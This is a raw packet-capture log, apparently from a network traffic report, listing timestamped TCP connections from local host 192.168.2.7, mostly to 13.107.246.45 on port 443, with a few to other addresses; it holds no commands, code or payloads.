                                                                                                                                                                                                Nov 20, 2024 10:54:50.957854033 CET49950443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.957860947 CET49938443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.957865953 CET4434993813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.957865953 CET4434995013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.957887888 CET49938443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.957889080 CET4434993913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.957891941 CET4434993813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.958782911 CET49939443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.958782911 CET49939443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.958796024 CET4434993913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.958810091 CET4434993913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.961414099 CET49951443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.961446047 CET4434995113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.961576939 CET49951443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.961905956 CET49951443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.961922884 CET4434995113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.976722002 CET4434993713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.976807117 CET4434993713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.976902008 CET49937443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.977212906 CET49937443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.977226019 CET4434993713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.980415106 CET49952443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.980454922 CET4434995213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:50.980597019 CET49952443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.980756044 CET49952443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:50.980787039 CET4434995213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.065093994 CET4434993913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.065368891 CET4434993913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.065423012 CET49939443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.118187904 CET49939443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.118187904 CET49939443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.118202925 CET4434993913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.118211985 CET4434993913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.123569965 CET49953443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.123590946 CET4434995313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.123711109 CET49953443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.123825073 CET49953443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.123835087 CET4434995313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.209192991 CET44349944184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.209285021 CET49944443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:51.212349892 CET49944443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:51.212353945 CET44349944184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.212601900 CET44349944184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.213772058 CET49944443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:51.255332947 CET44349944184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.554708004 CET44349944184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.569492102 CET44349944184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.572186947 CET49944443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:51.597649097 CET4434995113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.599353075 CET4434995013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.652375937 CET49951443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.652607918 CET49950443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.656876087 CET4434995213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.759541988 CET4434995313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.764944077 CET49952443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.957408905 CET49951443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.957458019 CET4434995113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.958211899 CET49951443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.958216906 CET4434995113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.958502054 CET49950443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.958524942 CET4434995013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.959225893 CET49950443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.959229946 CET4434995013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.959939003 CET49952443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.959969997 CET4434995213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.960537910 CET49952443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.960556030 CET4434995213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.960988045 CET49953443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.961003065 CET4434995313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.961504936 CET49953443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:51.961509943 CET4434995313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.971441031 CET49944443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:51.971447945 CET44349944184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:51.971461058 CET49944443192.168.2.7184.28.90.27
                                                                                                                                                                                                Nov 20, 2024 10:54:51.971478939 CET44349944184.28.90.27192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.053138971 CET4434995113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.054003954 CET4434995113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.054053068 CET49951443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.054220915 CET49951443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.054234982 CET4434995113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.054240942 CET49951443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.054245949 CET4434995113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.055418968 CET4434995013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.055927038 CET4434995013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.055985928 CET4434995013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.056026936 CET49950443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.056036949 CET4434995313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.056082964 CET49950443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.056571007 CET4434995313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.056622028 CET4434995313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.056684971 CET49953443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.058171988 CET49958443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.058204889 CET4434995813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.058257103 CET49958443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.058320045 CET49950443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.058320045 CET49950443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.058331013 CET4434995013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.058339119 CET4434995013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.059735060 CET49953443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.059743881 CET4434995313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.059755087 CET49953443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.059761047 CET4434995313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.060060024 CET49958443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.060075998 CET4434995813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.061574936 CET4434995213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.061831951 CET4434995213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.061893940 CET49952443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.062097073 CET49952443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.062112093 CET4434995213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.062249899 CET49959443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.062279940 CET4434995913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.062309980 CET49952443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.062319994 CET4434995213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.062340021 CET49959443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.062474012 CET49959443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.062489986 CET4434995913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.064388990 CET49960443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.064428091 CET4434996013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.064796925 CET49960443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.065824986 CET49960443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.065845013 CET4434996013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.066406012 CET49961443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.066427946 CET4434996113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.066567898 CET49961443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.066823959 CET49961443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.066836119 CET4434996113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.514058113 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:52.692981005 CET4434995813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.693464994 CET49958443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.693495989 CET4434995813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.693923950 CET49958443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.693929911 CET4434995813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.702055931 CET4434996013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.702749968 CET49960443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.702775955 CET4434996013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.702794075 CET49960443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.702797890 CET4434996013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.703305006 CET4434996113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.706276894 CET49961443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.706298113 CET4434996113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.706892967 CET49961443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.706898928 CET4434996113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.743810892 CET4434995913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.744242907 CET49959443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.744263887 CET4434995913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.745158911 CET49959443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.745163918 CET4434995913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.803575993 CET4434996013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.803776026 CET4434996013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.803824902 CET4434996013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.803909063 CET49960443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.804828882 CET4434996113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.805154085 CET4434996113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.805212975 CET49961443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.806606054 CET49960443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.806622028 CET4434996013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.806659937 CET49960443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.806665897 CET4434996013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.807696104 CET49961443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.807714939 CET4434996113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.807727098 CET49961443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.807733059 CET4434996113.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.810317039 CET49972443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.810326099 CET4434997213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.810753107 CET49972443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.810978889 CET49973443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.811021090 CET4434997313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.811095953 CET49973443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.813680887 CET49972443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.813694000 CET4434997213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.813851118 CET49973443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.813873053 CET4434997313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.842924118 CET4434995813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.850059986 CET4434995913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.850135088 CET4434995913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.850251913 CET49959443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.851774931 CET4434995813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.851870060 CET49959443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.851880074 CET4434995913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.851893902 CET49958443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.852865934 CET49958443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.852878094 CET4434995813.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.855424881 CET49974443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.855447054 CET4434997413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.855504036 CET49974443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.855808020 CET49975443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.855835915 CET4434997513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.855931044 CET49974443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.855931997 CET49975443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.855941057 CET4434997413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:52.856048107 CET49975443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:52.856060028 CET4434997513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.027832985 CET4434992713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.028434038 CET49927443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.028451920 CET4434992713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.029001951 CET49927443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.029015064 CET4434992713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.133085012 CET4434992713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.133420944 CET4434992713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.133475065 CET4434992713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.133542061 CET49927443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.133543015 CET49927443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.170624018 CET49927443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.170624018 CET49927443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.170641899 CET4434992713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.170650959 CET4434992713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.173763990 CET49980443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.173798084 CET4434998013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.173863888 CET49980443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.174034119 CET49980443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.174046993 CET4434998013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.459290028 CET4434997313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.459805012 CET49973443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.459829092 CET4434997313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.460244894 CET49973443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.460253000 CET4434997313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.478687048 CET4434997213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.479374886 CET49972443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.479391098 CET4434997213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.480523109 CET49972443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.480528116 CET4434997213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.500595093 CET4434997513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.531567097 CET4434997413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.534825087 CET49975443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.534838915 CET4434997513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.534848928 CET49975443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.534852982 CET4434997513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.535444975 CET49974443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.535471916 CET4434997413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.536128044 CET49974443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.536139011 CET4434997413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.559453011 CET4434997313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.559509993 CET4434997313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.559576988 CET49973443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.560127020 CET49973443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.560127020 CET49973443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.560142994 CET4434997313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.560152054 CET4434997313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.562503099 CET49984443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.562544107 CET4434998413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.562635899 CET49984443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.562850952 CET49984443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.562868118 CET4434998413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.602622032 CET4434997213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.602864981 CET4434997213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.602909088 CET4434997213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.602952003 CET49972443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.602992058 CET49972443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.607276917 CET49972443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.607295036 CET4434997213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.607300997 CET49972443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.607306004 CET4434997213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.613492012 CET49986443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.613532066 CET4434998613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.614228964 CET49986443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.614510059 CET49986443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.614530087 CET4434998613.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.638027906 CET4434997513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.638374090 CET4434997513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.638441086 CET49975443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.638463020 CET49975443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.638463020 CET49975443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.638479948 CET4434997513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.638489008 CET4434997513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.643150091 CET4434997413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.643260956 CET49989443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.643274069 CET4434998913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.643294096 CET4434997413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.643362999 CET49989443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.643379927 CET49974443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.643750906 CET49989443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.643759966 CET4434998913.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.643866062 CET49974443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.643866062 CET49974443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.643879890 CET4434997413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.643888950 CET4434997413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.646207094 CET49990443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.646254063 CET4434999013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.646320105 CET49990443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.646433115 CET49990443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.646462917 CET4434999013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.839258909 CET4434998013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.849632978 CET49980443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.849663019 CET4434998013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.850641012 CET49980443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.850646019 CET4434998013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.949841022 CET4434998013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.949917078 CET4434998013.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:53.949964046 CET49980443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:53.949975014 CET4434998013.107.246.45192.168.2.7
